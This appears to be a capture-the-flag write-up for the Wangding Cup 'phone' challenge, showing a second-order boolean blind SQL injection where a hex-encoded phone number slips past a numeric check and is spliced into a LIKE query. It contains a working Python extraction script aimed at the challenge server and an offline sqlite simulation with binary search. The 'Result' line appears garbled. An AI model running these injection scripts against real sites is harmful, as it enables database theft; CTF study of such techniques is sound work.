网鼎杯 (Wangding Cup) challenge "phone": MySQL injection through a hex literal
After registering, you can click a link to see who has a phone number similar to yours.
Registration has three required fields: username, password and phone. The phone must be numeric.
Register with the phone 1111 and click the link: the page says 1 person has a phone similar to mine. Register a second account with 1111 and it says 2. So the phone is being used in a database query, and the only thing that comes back is a count.
That gives a boolean blind-injection approach: at registration, submit the phone as a hex literal. The numeric check lets a 0x... string through (PHP's is_numeric() accepted hex strings before PHP 7, which is presumably what the check uses here), while MySQL reads 0x... as a binary string, so what gets stored in the phone column is the decoded payload, which is later spliced into the LIKE query on query.php. The count is greater than 0 when the injected condition is true and 0 when it is false.
The Python script:
```python
# coding=utf-8
import binascii
import re

import requests


def login_sqli(url, username, password, payload):
    """Register a user whose phone field carries the (hex-encoded) payload,
    then open query.php, which runs the stored phone through the LIKE query."""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0'
    }
    data = {'username': username,
            'password': password,
            'phone': payload,
            'register': 'Login'}
    try:
        # get a session cookie
        s = requests.session()
        s.get(url + '/index.php', headers=headers)
        # register: the phone field is the injection point
        s.post(url + '/register.php', data=data, headers=headers)
        # trigger the query that uses the stored phone
        req3 = s.get(url + '/query.php', headers=headers)
        return req3.text
    except requests.RequestException as e:
        print('Error', e)
        return ''


if __name__ == '__main__':
    login_url = 'http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com'
    password = '123123'
    pattern = re.compile(r'\d?\d?\d?\d?\d?\d')   # the "N people" count in the response
    for i in range(1, 43):            # byte position in the flag
        for j in range(33, 128):      # printable ASCII
            # stored phone becomes: 5555%' and ord(mid((select * from flag),i,1))=j #
            # so the LIKE query matches (count > 0) only when byte i of the flag is j
            payload = "5555%%' and ord(mid((select * from flag),%d,1))=%d #" % (i, j)
            _payload = '0x' + binascii.hexlify(payload.encode()).decode()
            username = 'userrif' + str(i) + str(j)
            text = login_sqli(login_url, username, password, _payload)
            r = re.search(pattern, text)
            if r and int(r.group()) > 0:
                print(str(i) + '-->' + chr(j))
                break   # found this byte, move to the next position
```
Result:
x000s'''
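The following is an added example, not code from the original writeup or from the challenge. It models the whole chain offline so the mechanism can be checked without the CTF server: a numeric check that, like PHP's is_numeric() before PHP 7, accepts a 0x-prefixed string (assumption about the challenge's check, emulated roughly here); the MySQL behaviour of storing a 0x... literal as its decoded bytes in a VARCHAR column (emulated in Python, because sqlite, used here as a stand-in database, reads 0x... as an integer); the LIKE query on query.php with the stored phone concatenated in; and the boolean oracle. `ord()` and `mid()` are registered on the sqlite connection to stand in for MySQL's, and the payload ends in `-- ` instead of `#` because sqlite has no `#` comments. The flag value is constructed. The extraction loop goes beyond the original script: it binary-searches each byte (7 requests per byte instead of a linear scan over 33..127) and stops when `mid()` runs past the end of the string, where MySQL's `ord('')` is 0.

```python
import re
import sqlite3

# Constructed stand-in for the contents of the challenge's `flag` table.
FLAG = "flag{hex_literal_bypasses_the_numeric_check}"


def php_is_numeric(value):
    """Rough emulation of PHP < 7 is_numeric(): decimal/float syntax or a 0x hex string.
    Assumption: this is the kind of check register.php applies to the phone field."""
    return re.fullmatch(r"\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?|0[xX][0-9a-fA-F]+", value) is not None


def hex_literal(sql_fragment):
    """Encode the injection payload as a MySQL hex literal, as the original script does."""
    return "0x" + sql_fragment.encode().hex()


def mysql_stores(value):
    """What lands in a VARCHAR column: MySQL reads 0x... as a binary string, so the decoded
    payload is stored. Emulated here because sqlite would treat 0x... as an integer."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", value):
        return bytes.fromhex(value[2:]).decode("latin-1")
    return value


class PhoneApp:
    """Minimal sqlite model of register.php and query.php."""
    COMMENT = "-- "   # sqlite has no '#' comments; the original uses '#' against MySQL

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        # stand-ins for MySQL's ord() and mid(); ord('') is 0 as in MySQL
        self.db.create_function("ord", 1, lambda s: ord(s[0]) if s else 0)
        self.db.create_function("mid", 3, lambda s, p, n: s[p - 1:p - 1 + n])
        self.db.execute("create table users (username text, phone text)")
        self.db.execute("create table flag (flag text)")
        self.db.execute("insert into flag values (?)", (FLAG,))
        self.requests = 0

    def register(self, username, phone):
        if not php_is_numeric(phone):
            raise ValueError("phone must be numeric")
        self.db.execute("insert into users values (?, ?)", (username, mysql_stores(phone)))
        return username

    def query(self, username):
        """query.php: how many users have a phone LIKE '%<my phone>%'. The stored phone is
        concatenated into the SQL, which is where the decoded payload takes effect."""
        (phone,) = self.db.execute("select phone from users where username=?", (username,)).fetchone()
        sql = "select count(*) from users where phone like '%" + phone + "%'"
        self.requests += 1
        return self.db.execute(sql).fetchone()[0]


def oracle(app, pos, op, value):
    """True when byte `pos` of the flag satisfies `ord(byte) <op> value`."""
    frag = "5555%%' and ord(mid((select * from flag),%d,1))%s%d %s" % (pos, op, value, app.COMMENT)
    user = app.register("u%d" % app.requests, hex_literal(frag))
    return app.query(user) > 0


def extract_flag(app, max_len=64):
    """Binary search each byte in [0, 127]; a result of 0 means mid() ran past the end."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(app, pos, ">", mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    app = PhoneApp()
    print(extract_flag(app), "after", app.requests, "queries")
```

Against the real target, `PhoneApp.register`/`query` would be replaced by the HTTP calls of the original script, `COMMENT` set back to `#`, and the count parsed out of the response text; the payload construction, hex encoding and search loop stay the same.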